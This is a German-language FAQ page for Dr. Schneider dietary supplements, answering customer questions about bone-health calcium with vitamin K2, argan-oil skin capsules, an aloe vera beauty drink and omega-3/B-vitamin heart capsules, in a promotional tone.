Das fettlösliche Vitamin K ist besonders bekannt als wichtiger Nährstoff für die Blutgerinnung und ein Vitamin-K-Mangel kann zu Blutungen führen. Wissenschaftler haben entdeckt, dass es im Körper weitere Vitamin-K-abhängige Stoffwechselvorgänge gibt. Es ist ein Co-Faktor für das Protein Osteocalcin, einem Regulator der Knochenmineralisierung. Schon seit mehreren Jahrzehnten wird Vitamin K2 wissenschaftlich untersucht, doch erst neuste Studien der Universität in Maastricht haben die enorme Bedeutung von Vitamin K2 für die Knochengesundheit zeigen können und damit das Interesse weiterer Wissenschaftler geweckt. Vitamin K2 steuert wie Calcium im Körper gespeichert und verwertet wird, somit trägt Vitamin K insgesamt zur Erhaltung gesunder Knochen bei.

Wie kann ich feststellen, ob meine Knochendichte im normalen Bereich liegt?

In vielen Apotheken kann man heute Knochendichtemessungen durchführen lassen. Die Kosten liegen meistens unter 15 Euro. Die Messung dauert meist nur wenige Minuten und wird an der Ferse durchgeführt. Damit bekommt man einen ersten Anhaltspunkt und kann dann entscheiden, ob eine spezielle DXA-Messung beim Arzt veranlasst werden sollte zum Ausschluss einer Osteoporose. Sobald Sie Ihre Knochendichte kennen, können Sie auch entscheiden, welche Schritte eingeleitet werden müssen. Je früher, desto besser.

Wann spricht man von Osteoporose?

Osteoporose wird häufig zu spät erkannt. Bei einem Viertel der Betroffenen wird erst nach dem ersten Knochenbruch die Diagnose gestellt. Daher sollte man ab einem gewissen Alter regelmäßig Knochendichtemessungen durchführen lassen, vor allem wenn es klassische Risikofaktoren gibt oder in der Familie vermehrte Fälle von Osteoporose bekannt sind. Von Osteoporose wird gesprochen, wenn der Knochen an Stabilität, Elastizität und Bruchfestigkeit einbüßt, hervorgerufen durch einen unnatürlich, schnell fortschreitenden Verlust an Knochensubstanz. Dies kann dazu führen, dass der Knochen schon bei alltäglicher Belastung bricht.

Warum sind die Dr. Schneider Knochen Vital Plus Kapseln so klein im Vergleich zu anderen Calcium Produkten?

Die „Nationale Verzehrstudie II“ hat gezeigt, dass die Versorgung mit Calcium zwar gut aber nicht ausreichend ist. Wir bei Dr. Schneider wollen diese Lücke schließen und bedarfsgerecht mit Calcium ergänzen. Dabei spielt die richtige Kombination aus Mineralstoff und den „Verwertungs- und Einbauhelfern“ eine wichtige Rolle, damit das eingenommene Calcium vom Körper aufgenommen und in die Knochen eingelagert wird. „Viel-hilft-viel“ ist nicht immer der richtige Ansatz, sondern hier zählt „das Richtige zur richtigen Zeit am richtigen Ort“.

Haut Spezial mit Arganöl

Neuerdings höre ich überall den Begriff „Arganöl“ – was ist das?

Arganöl wird aufgrund seiner Farbe, Einzigartigkeit und seines hohen Preises auch „das flüssige Gold aus Marokko“ genannt. Arganöl wird aus den Samen des Arganbaumes (Argania spinosa L. Skeels) gewonnen, der bis heute nahezu ausschließlich tief im Südwesten Marokkos wächst. Die mandelartigen Samen enthalten bis zu 55% Öl, wovon bis zu 80% einfach und mehrfach ungesättigte Fettsäuren sind. Bei der Beschaffung unseres Arganöls achten wir sehr auf nachhaltige Landwirtschaft. Viele der nötigen Arbeitsschritte werden auch heute noch von Hand gemacht, um die hohe Qualität des Öls gewährleisten zu können. Wenn die Arganbaumfrüchte reif sind, fallen Sie von den Bäumen, werden aufgesammelt und mehrere Wochen in der Sonne getrocknet. Anschließend wird die getrocknete Frucht in aufwendiger Handarbeit geknackt. Die daraus resultierende Argannuss wird dann weiter aufgebrochen, sodass am Ende die Arganmandel für die Öl-Pressung zur Verfügung steht.

 

Das Arganöl für Dr. Schneider Haut Spezial wird schonend kalt gepresst, damit alle Nährstoffe erhalten bleiben. Zu den wichtigsten Nährstoffen im Arganöl zählen:

 

Einfach und mehrfach ungesättigte Fettsäuren, Phytosterole und Squalen, Tocopherole (Vitamin E), Polyphenole und Triterpene

Warum wird Arganöl auch das flüssige Gold aus Marokko genannt?

Es gibt sicher zwei gute Gründe, warum das Arganöl das flüssige Gold aus Marokko genannt wird. Zum einen ist es die kraftvolle gelb-goldene bis braun-goldene Farbe, die sicher für diese Metapher verantwortlich ist. Vielmehr aber der sehr hohe Preis, der durch die aufwendige Herstellung zustande kommt. In Dr. Schneider Haut Spezial mit Arganöl setzen wir ein sehr hochwertiges Öl ein, das auf traditionelle Weise hergestellt wird. Die Gewinnung ist sehr zeitaufwändig und mühsam aber insbesondere mit viel Handarbeit verbunden. Die gesammelten Früchte werden gedörrt, anschließend geschält und schließlich die Schale der Nuss aufgebrochen, so dass man an die Samen bzw. Mandel gelangt. Diese Mandeln werden dann gemahlen und mechanisch gepresst, so dass man aus 100 kg Früchten am Ende ca. 1,5-2 Liter Arganöl bekommt. Um diese Menge an Öl zu produzieren sind ca. 55 – 60 Stunden manuelle Arbeit notwendig.

Wo kommt das Arganöl her?

Der Arganbaum wächst nur in Marokko auf den Südhängen des Hohen Atlas und Nordhängen des westlichen Anti-Atlas, sowie den dazwischen liegenden Flussbecken der Flüsse Massa und Souss. Diese Region wird Arganeraie genannt und umfasst sechs Provinzen (Esssaouira, Taroudant, Agadir Ida-Outananane, Inezgane Ait Melloul, Chtouka Ait Baha und Ziznit). Das Gebiet wurde wegen seiner Einzigartigkeit zum Biosphären-Reservat erklärt und seit 1999 Weltkulturerbe der UNESCO. Trotzdem ist der Arganbaum noch immer vom Aussterben bedroht.

Wie oft oder wann soll ich das Produkt nehmen?

Genau wie bei der täglichen Hautpflege mit einer Tagescreme empfehlen wir einmal täglich eine Kapsel des hochwertigen Dr. Schneider Haut Spezial mit Arganöl zu einer Mahlzeit zu nehmen. Wir sprechen daher auch gerne von der täglichen Schönheitspflege von innen. Versuchen Sie die Einnahme in ihren normalen Alltag einzubauen. Wir haben daher ein kleines, leicht zu schluckendes Kapselformat gewählt. Auch die Blisterverpackung ermöglicht es Ihnen, einfach ein paar Kapseln abzuschneiden und diese in Ihrer Handtasche ins Büro oder in die Ferien mitzunehmen.

Die Kapseln sind so klein – hat das einen Grund?

Wir entwickeln unsere Produkte unter Berücksichtigung neuster wissenschaftlicher Erkenntnisse und versuchen für unsere Produkte immer die technisch sinnvollste aber auch innovativste Darreichungsform zu wählen. Speziell beim Dr. Schneider Haut Spezial mit Arganöl haben wir es geschafft, eine Vielzahl hochwertiger Inhaltstoffe in eine sehr kleine und damit leicht zu schluckende Kapsel zu verpacken. Dadurch werden die tägliche Einnahme und damit die tägliche Schönheitspflege von Innen leicht gemacht.

Wie lange muss ich Dr. Schneider Haut Spezial mit Arganöl einnehmen?

Dr. Schneider Haut Spezial mit Arganöl Kapseln sind Nahrungsergänzungsmittel und können ohne zeitliche Begrenzung eingenommen werden. Wir haben unser Produkt so entwickelt, dass die Einnahme der Kapseln einfach in den Tagesverlauf eingebaut werden kann. Wie ihre tägliche äußere Schönheitspflege mit Tagescremes, können Sie auch ihre Schönheit nun von Innen pflegen. Das Riboflavin schütz Ihre Zellen vor oxidativen Stress und das Biotin trägt zu normalem Haar und normaler Haut bei.

Ab welchem Alter empfehlen Sie Dr. Schneider Haut Spezial mit Arganöl einzunehmen?

Sie können eigentlich nicht früh genug anfangen, Ihre Haut mit zusätzlichen Nährstoffen zu versorgen. Die Haut ist unser größtes Organ und sollte auch die größte Aufmerksamkeit bekommen. Gleich wie wir unsere Haut schon früh mit pflegenden Lotionen und Cremes von Außen verwöhnen sollten wir auch früh anfangen, unsere Haut von innen etwas zu unterstützen. Die Hautalterung wird insbesondere von externen Einflüssen stark beeinflusst. Schwerwiegendste Risikofaktoren sind UV-Strahlen des Sonnenlichts und Zigarettenrauch, die zu sogenannten freien Radikalen, freien Sauerstoffradikalen (ROS) oder allgemein zu oxidativem Stress führen können und somit die Hautzellen schädigen. Antioxidantien wie das in Dr. Schneider Haut Spezial mit Arganöl enthaltene Riboflavin können die Zellen vor oxidativem Stress schützen.

Ist das Produkt Halal?

Dr. Schneider Haut Spezial mit Arganöl hat als einzigen tierischen Inhaltsstoff die Gelatinehülle. Für die verwendete Rindergelatine liegen „Halal-Zertifikate“ vor.

Aloe Vera Beauty Instant Drink

Woher kommt die Aloe Vera in Dr. Schneider Aloe Vera Beauty Drink?

Unter dem Gattungsnamen Aloe sind mehrere Pflanzenarten zusammen gefasst. Obwohl es wohl an die 400 Unterarten gibt, hat sich eine einzige Art durchsetzen können, die seit Jahrhunderten für ihre zugeschriebenen Eigenschaften bekannt ist. Wissenschaftler konnten mittlerweile über 200 verschiedene Inhaltsstoffe identifizieren und nachweisen. Wir sprechen von der Aloe Vera Barbadensis Miller, benannt nach dem englischen Botaniker M. Miller.

 

Über den genauen Ursprung der Aloe Vera Pflanzen streiten sich die Wissenschaftler. Irgendwo in Afrika – zwischen Südafrika und Arabischer Halbinsel. Mittlerweile wird Aloe Vera weltweit in subtropischen Gebieten kultiviert.

 

Wir haben uns entschieden, für Dr. Schneider Aloe Vera einen speziellen Aloe Vera Extrakt aus dem Ursprungsland der Aloe Vera zu wählen und haben in Süd Afrika einen erstklassigen Hersteller gefunden, der mittels nachhaltiger Landwirtschaft und biologischem Anbau Aloe Vera Produkte von höchster Qualität erzeugt.

Welcher Teil der Aloe Vera wird verwendet? Da gibt es wohl Unterschiede, oder?

Für Dr. Schneider Aloe Vera werden nur die sogenannten Filets der Blätter verwendet, der Gelkörper. Nach der Ernte der äußeren Blätter werden diese sorgfältig geschält. Das Blattmark wird schonend weiterverarbeitet, so dass ein 200fach konzentrierter Extrakt entwickelt werden konnte. Es ist sehr wichtig, dass bei der Verarbeitung nur das Innere der Aloe Vera Blätter verwendet wird, da in den äußeren Schichten bestimmte Pflanzenstoffe wie Anthranoide (z. B. Aloin) enthalten sind, die aufgrund Ihrer Nebenwirkungen einen bestimmten gesetzlich vorgeschriebenen Höchstwert nicht überschreiten dürfen. Günstige Nahrungsergänzungsmittel oder Importe aus Drittländern verwenden aus Kostengründen oft die ganzen Blätter.

 

Ich habe gehört, die Instant Drink Tabletten wurden mit einem speziellen Verfahren hergestellt. Stimmt das?

Das ist richtig. Für die Herstellung der Dr. Schneider Linie versuchen wir immer bei der Produktentwicklung die besten Technologien für das Produkt zu erarbeiten, wie auch die beste Darreichungsform anzuwenden, die sich je nach eingesetzten Nährstoffen, Formulierung, Indikationsgebiet und Zielgruppe unterscheiden kann. Für Dr. Schneider Aloe Vera haben wir uns entschieden eine Instant Drink Tablette in einem sogenannten Wirbelschicht-Sprühgranulations-Verfahren herzustellen. Das ist ein sehr spezielles Verfahren und unterscheidet das Produkt von günstigen Brausetabletten. Der Vorteil ist neben einem schnellen Auflösen im Wasserglas, insbesondere die schonende Verarbeitung der Aktivstoffe wie die empfindlichen Vitamine und der Aloe Vera Extrakt. Außerdem kann mit dem Verfahren ein spezielles Aroma-Profil erreicht werden.

Wie viele Kalorien hat eine Tablette?

Aufgelöst in einem Glas mit 200 ml Wasser ergibt sich bei Dr. Schneider Aloe Vera ein Energie-Wert von ca. 39 kJ / 9 kcal. Im Vergleich hat ein Glas (200 ml) Apfelsaft ca. 386 kJ / 92 kcal.

Werden künstliche Farbstoffe verwendet?

Nein, wir haben bei dem Produkt bewusst auf künstliche Farbstoffe verzichtet. Die schöne rosa Farbe in Dr. Schneider Aloe Vera kommt von dem zugesetzten natürlichen Farbstoff Betenrot. Betenrot ist ein in der Natur vorkommender roter Farbstoff, der aus der Roten Bete extrahiert wird.

Kann ich das Produkt kombinieren mit Dr. Schneider Haut Spezial mit Arganöl?

Da es sich bei Dr. Schneider Aloe Vera als Nahrungsergänzungsmittel um ein Lebensmittel im weitesten Sinne handelt, können Sie es auch immer mit anderen Lebensmitteln oder Nahrungsergänzungsmitteln kombinieren.

Aloe Vera ist ein Bestandteil meiner Tagescreme – ist es da sinnvoll auch noch Dr. Schneider Aloe Vera als Beauty Drink einzunehmen?

Es ist immer die beste Lösung, wenn man seine Haut von außen und innen pflegt. Es spricht einiges dafür, dass Sie ihre Aloe Vera haltige Tagescreme mit Dr. Schneider Aloe Vera kombinieren. Mit topischen Pflegeprodukten erreichen Sie nur die äußersten Hautschichten, wohingegen Sie bei oraler Einnahme den ganzen Körper mit Nährstoffen versorgen können. Es gibt zahlreiche Studien zu den in Dr. Schneider Aloe Vera enthaltenen Nährstoffen und den positiven Einflüsse beispielsweise spielt Vitamin A eine wichtige Rolle zum Erhalt gesunder Haut. Zusätzlich unterstützt Biotin auch den Erhalt gesunder Haare. Unser Beauty Instant Drink bringt durch die zusätzliche Feuchtigkeitsversorgung des Organismus auch Feuchtigkeit für unsere Haut.

Herz 1x1

Hilft Herz 1x1 auch bei Bluthochdruck?

Sollten Sie unter hohem Blutdruck leiden, müssen Sie unbedingt mit Ihrem behandelnden Arzt einen Therapie-Ansatz besprechen. Hoher Blutdruck gilt als großer Risikofaktor für viele schwerwiegende Erkrankungen. Dennoch kann der Blutdruck auch mit natürlichen Mitteln positiv beeinflusst werden. Eine große Rolle spielen dabei die Ernährung und ein aktiver Lebensstil, welcher tägliche Bewegung – idealerweise an der frischen Luft und eine positive Einstellung beinhaltet. Bei nur leicht erhöhtem Blutdruck kann eine positive Umstellung des Lebensstils dazu führen, dass weniger Medikamente eingenommen werden müssen oder idealerweise sogar gar keine mehr benötigt werden. Ein wichtiger Ernährungstipp ist beispielsweise weniger Salz zu sich zu nehmen. Bei bis zu 75 % der Menschen mit erhöhtem Blutdruck liegt je nach Alter eine sogenannte Salzsensitivität vor. In diesen Fällen können die Blutdruckwerte auch von der aufgenommenen Salzmenge abhängen. Ob dies bei Ihnen der Fall ist, können Sie mit einer salzarmen Ernährung einfach testen und verfolgen, wie sich Ihre Werte verändern. Nach zwei Wochen sollten erste Effekte zu sehen sein.

 

Auch kann man seine Ernährung anreichern mit bestimmten Nährstoffen, die einen positiven Einfluss auf den Blutdruck und die Herzfunktion im Allgemeinen haben. Die Europäischen Behörden haben sogar offizielle gesundheitsbezogene Aussagen veröffentlicht, die auf wissenschaftlichen Studien basieren. So wird von den Behörden bestätigt, dass die Omega-3-Fettsäuren DHA und EPA zur Aufrechterhaltung eines normalen Blutdrucks beitragen können. Diese positive Wirkung stellt sich bei einer täglichen Aufnahme von 3 g EPA und DHA ein. Eine Kapsel Dr. Schneider Herz 1×1 leistet mit 250 mg EPA und DHA einen Beitrag zu den notwendigen 3 g.

Was hat es mit dem Homocystein-Spiegel auf sich?

Studien hatten bereits vor vielen Jahren zeigen können, dass erhöhte Werte der Aminosäure „Homocystein“ im Blut mit einer erhöhten Rate an Herzinfarkten, Schlaganfällen oder Durchblutungsstörungen der Extremitäten einhergehen können. In vielen Fällen konnte gezeigt werden, dass erhöhte Homocystein-Spiegel einfach mit Vitaminen positiv beeinflusst werden können. Insbesondere untersuchten die Wissenschaftler die Kombination von Folsäure, Vitamin B6 und Vitamin B12. Diese Vitamine wurden daher in der Vergangenheit häufig von ärztlicher Seite zum Schutz vor Herzinfarkten empfohlen, wenn sich in Blutuntersuchungen erhöhte Homocystein-Werte fanden.

 

Auch die Europäischen Behörden haben die wissenschaftlichen Studien ausgewertet und eine gesundheitsbezogene Aussage für Folsäure, Vitamin B6 und Vitamin B12 zugelassen und bestätigt, dass diese Vitamine zu einem normalen Homocystein-Stoffwechsel beitragen. Daher haben wir uns entschieden, dass diese Vitamine in angemessener Konzentration auch in Dr. Schneider Herz 1×1 enthalten sein müssen.

Was sind die typischen Risiko-Faktoren für Herz-Erkrankungen?

Man unterscheidet zwischen nicht beeinflussbaren und beeinflussbaren Risikofaktoren.

 

Nicht beeinflussbare Risikofaktoren sind:

Alter (Risiko steigt mit zunehmendem Alter)

Geschlecht (Risiko ist bei Männern höher)

Familiäre Vorbelastung (genetische Prädisposition)

Beeinflussbare Risikofaktoren sind:

Übergewicht (insbesondere bei hohen „body-mass-index“ BMI)

Bluthochdruck

Erhöhte Blutfettwerte (Cholesterin)

Erhöhte Homocysteinwerte

Rauchen

Übermäßiger Alkoholkonsum

Diabetes mellitus Typ II

Stress

Ungenügende körperliche Bewegung

Personen mit besonderer Ausprägung der oben aufgeführten Risikofaktoren (z.B. starker Raucher) gehören zur Hochrisikogruppe für einen Herzinfarkt, insbesondere wenn mehrere Risikofaktoren in Kombination vorliegen. Patienten mit bekannter Herzgefäßerkrankung oder Zustand nach Herzinfarkt sowie Patienten mit Arteriosklerose zählen auch zur stark gefährdeten Personengruppe.

Was hat Arteriosklerose mit dem Herzen zu tun?

Kommt es in den Arterien zu Ablagerungen aus Fett und Kalk – sogenannte Plaques, spricht man von Arteriosklerose. Arteriosklerose kann in allen Arterien auftreten. Dadurch verändern sich die Gefäßwände, die dicker und steifer werden. Bei zunehmender Plaque-Bildung wird der innere Durchmesser der Gefäße immer kleiner. Das führt dazu, dass das Blut nicht mehr ungehindert durchströmen kann. Je nach Ausprägung kommt es zu Durchblutungsstörungen und im schlimmsten Fall zu einem kompletter Gefäßverschluss. Die Folge ist ein Infarkt.

Diese Durchblutungsstörungen treten besonders häufig am Herz und an den Hirnschlagadern auf. Daher ist die Arterienverkalkung am Herzen die Hauptursache von Herz-Kreislauf-Erkrankungen wie Herzinfarkt oder Herzschwäche. Bei Verkalkung der Arterien im Hirn kann es zum Schlaganfall kommen. Etwa 50% aller Todesfälle in der westlichen Welt sind auf Gefäßverkalkung zurück zu führen.

Ein erhöhter Homocystein-Spiegel wird als ein wichtiger Risikofaktor für Arteriosklerose beschrieben. Nährstoffe wie Folsäure, Vitamin B6 und Vitamin B12, die in Dr. Schneider Herz 1×1 enthalten sind tragen zu einem normalen Homocystein-Stoffwechsel bei. Auch die Omega-3-Fettsäuren EPA und DHA sollen einen positiven Einfluss auf die Blutfettwerte (Bluttriglycerid-Werte) haben. Diese positive Wirkung stellt sich bei einer täglichen Aufnahme von 2 g EPA und DHA ein. Eine Kapsel Dr. Schneider Herz 1×1 leistet mit 250 mg EPA und DHA einen Beitrag zu den notwendigen 2 g.